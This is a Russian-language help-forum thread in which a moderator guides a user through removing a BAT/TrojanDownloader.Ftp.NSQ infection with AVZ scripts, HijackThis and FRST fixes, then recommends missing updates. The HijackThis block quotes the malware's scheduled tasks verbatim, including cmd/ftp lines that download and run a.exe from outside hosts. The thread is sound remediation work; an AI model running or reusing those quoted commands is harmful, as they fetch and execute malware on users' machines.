• Внимание. Восстановление баз 1С7, 1C8 и Mssql после атаки шифровальщика, подробности и отзывы читайте в профильной теме.

Решена TrojanDownloader.Ftp.NSQ троянская программа

Статус
В этой теме нельзя размещать новые ответы.

коржов

Пользователь
Сообщения
13
Реакции
2
Баллы
43
помогите удалить вирус
Журнал
C:\Windows\System32\p - BAT/TrojanDownloader.Ftp.NSQ троянская программа - очищен удалением [1]
Журнал
C:\Windows\System32\s - BAT/TrojanDownloader.Ftp.NSQ троянская программа - очищен удалением [1]

нодом удаляется но при перезагрузке восстанавливается. Возможно из-за него упала скорость интернета. Спасибо.
 

коржов

Пользователь
Сообщения
13
Реакции
2
Баллы
43
Лог файл, но после удаления нодом. Если надо могу сделать перезагрузку и снова сформировать лог файл
 

Вложения

  • CollectionLog-2017.09.16-16.11.zip
    70 KB · Просмотры: 6
Последнее редактирование:

akok

Команда форума
Администратор
Сообщения
19,951
Реакции
13,638
Баллы
2,203
Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):
Код:
  begin
 SearchRootkit(true, true);
 SetAVZGuardStatus(True);
 ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
 QuarantineFile('c:\windows\debug\item.dat>', '');
 QuarantineFile('C:\Program Files (x86)\E0C03C8B-1463762770-DF11-AAA2-F707C1D94CDF\knsj692D.tmpfs', '');
 DeleteFile('C:\Program Files (x86)\E0C03C8B-1463762770-DF11-AAA2-F707C1D94CDF\knsj692D.tmpfs', '32');
 DeleteFile('c:\windows\debug\item.dat>', '32');
 DeleteFile('C:\Windows\system32\Tasks\Mysa2', '64');
 DeleteFile('C:\Windows\system32\Tasks\Mysa', '64');
 DeleteService('besohokuzbt');
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1804', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '2201', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1004', 3);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1001', 1);
 RegKeyIntParamWrite('HKCU', 'Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\', '1201', 3);
BC_ImportALL;
ExecuteSysClean;
 ExecuteWizard('SCU', 2, 3, true);
BC_Activate;
RebootWindows(true);
end.
После выполнения скрипта компьютер перезагрузится.

Код:
begin
 CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
end.


Полученный архив отправьте при помощи этой формы

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):
Код:
O22 - Task (Ready): Mysa - C:\Windows\system32\cmd.exe /c echo open down.5b6b7b.ru>s&echo test>>s&echo 1433>>s&echo binary>>s&echo get a.exe>>s&echo bye>>s&ftp -s:s&a.exe
O22 - Task (Ready): Mysa2 - C:\Windows\system32\cmd.exe /c echo open ftp.oo000oo.me>p&echo test>>p&echo 1433>>p&echo get s.dat c:\windows\debug\item.dat>>p&echo bye>>p&ftp -s:p
O23 - Service S2: Live Zip Code - (besohokuzbt) - C:\Program (file missing)

Для повторной диагностики запустите снова AutoLogger. В первом диалоговом окне нажмите "ОК", удерживая нажатой клавишу "Shift".

Вашего провайдера IP?
85.175.46.122
85.175.46.130

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.
 

коржов

Пользователь
Сообщения
13
Реакции
2
Баллы
43
прикладываю FRST.txt, Addition.txt, Shortcut.txt
 

Вложения

  • Addition.txt
    36.7 KB · Просмотры: 4
  • FRST.txt
    17.3 KB · Просмотры: 3
  • Shortcut.txt
    60.5 KB · Просмотры: 1

akok

Команда форума
Администратор
Сообщения
19,951
Реакции
13,638
Баллы
2,203
  • Отключите до перезагрузки антивирус.
  • Выделите следующий код:
    Код:
    Start::
    CreateRestorePoint:
    GroupPolicy\User: Restriction <==== ATTENTION
    HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <==== ATTENTION
    Task: {9B2F31B5-0122-48E6-8292-04F162DA332B} - \Mysa -> No File <==== ATTENTION
    Task: {E1E7D205-C14C-4F15-9DC9-EAB224BFEC24} - \Mysa2 -> No File <==== ATTENTION
    AlternateDataStreams: C:\ProgramData\TEMP:58A5270D [284]
    AlternateDataStreams: C:\ProgramData\TEMP:CB0AACC9 [135]
    AlternateDataStreams: C:\Users\Все пользователи\TEMP:58A5270D [284]
    AlternateDataStreams: C:\Users\Все пользователи\TEMP:CB0AACC9 [135]
    EmptyTemp:
    Reboot:
    End::
  • Скопируйте выделенный текст (правой кнопкой - Копировать).
  • Запустите FRST (FRST64) от имени администратора.
  • Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.
Что с проблемами?
 

akok

Команда форума
Администратор
Сообщения
19,951
Реакции
13,638
Баллы
2,203
Можете и просканировать. Я о том, всплывают уведомления после перезагрузки
Журнал
C:\Windows\System32\p - BAT/TrojanDownloader.Ftp.NSQ троянская программа - очищен удалением [1]
Журнал
C:\Windows\System32\s - BAT/TrojanDownloader.Ftp.NSQ троянская программа - очищен удалением [1]
 

коржов

Пользователь
Сообщения
13
Реакции
2
Баллы
43
Можете и просканировать. Я о том, всплывают уведомления после перезагрузки
Они не всплывали, они появлялись только при сканировании. произвел перезагрузку проверил сканированием все чисто. спасибо Вам
 

akok

Команда форума
Администратор
Сообщения
19,951
Реакции
13,638
Баллы
2,203
Тогда завершаем
Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:
  1. Запустите AVZ.
  2. Выполните обновление баз (Меню Файл - Обновление баз)
  3. Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
  4. В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
  5. Закачайте полученный архив, как описано на этой странице.
  6. Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.

Подготовьте лог лог SecurityCheck by glax24 и исправьте (по возможности) все найденные утилитой проблемы.

Ознакомьтесь: Рекомендации после лечения
 

коржов

Пользователь
Сообщения
13
Реакции
2
Баллы
43
добавляю лог securityCheck
как правильно удалить утилиты если они все в папке автологгер
и особенно утилиту frst 64
 

Вложения

  • SecurityCheck.txt
    15.4 KB · Просмотры: 1

akok

Команда форума
Администратор
Сообщения
19,951
Реакции
13,638
Баллы
2,203
как правильно удалить утилиты если они все в папке автологгер
Просто удалите папку c утилитами.

Исправьте по возможности:
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.0.9600.17843 Внимание! Скачать обновления
Контроль учётных записей пользователя отключен

Запрос на повышение прав для администраторов отключен
^Рекомендуется включить: Win+R ввести UserAccountControlSettings и Enter^
Автоматическое обновление отключено
------------------------------- [ HotFix ] --------------------------------
HotFix KB3115858 Внимание! Скачать обновления
HotFix KB3140735 Внимание! Скачать обновления
HotFix KB3138910 Внимание! Скачать обновления
HotFix KB3138962 Внимание! Скачать обновления
HotFix KB3145739 Внимание! Скачать обновления
HotFix KB3146963 Внимание! Скачать обновления
HotFix KB3156013 Внимание! Скачать обновления
HotFix KB3156016 Внимание! Скачать обновления
HotFix KB3156019 Внимание! Скачать обновления
HotFix KB3155178 Внимание! Скачать обновления
HotFix KB3153171 Внимание! Скачать обновления
HotFix KB3170455 Внимание! Скачать обновления
HotFix KB3178034 Внимание! Скачать обновления
HotFix KB3185911 Внимание! Скачать обновления
HotFix KB3184122 Внимание! Скачать обновления
HotFix KB3192391 Внимание! Скачать обновления
HotFix KB3197867 Внимание! Скачать обновления
HotFix KB3205394 Внимание! Скачать обновления
HotFix KB4012212 Внимание! Скачать обновления
HotFix KB4019263 Внимание! Скачать обновления
HotFix KB4022722 Внимание! Скачать обновления
HotFix KB4015546 Внимание! Скачать обновления
HotFix KB4025337 Внимание! Скачать обновления
HotFix KB4034679 Внимание! Скачать обновления
--------------------------- [ OtherUtilities ] ----------------------------
WinRAR 4.20 (32-разрядная) v.4.20.0 Внимание! Скачать обновления
 
Статус
В этой теме нельзя размещать новые ответы.
Сверху Снизу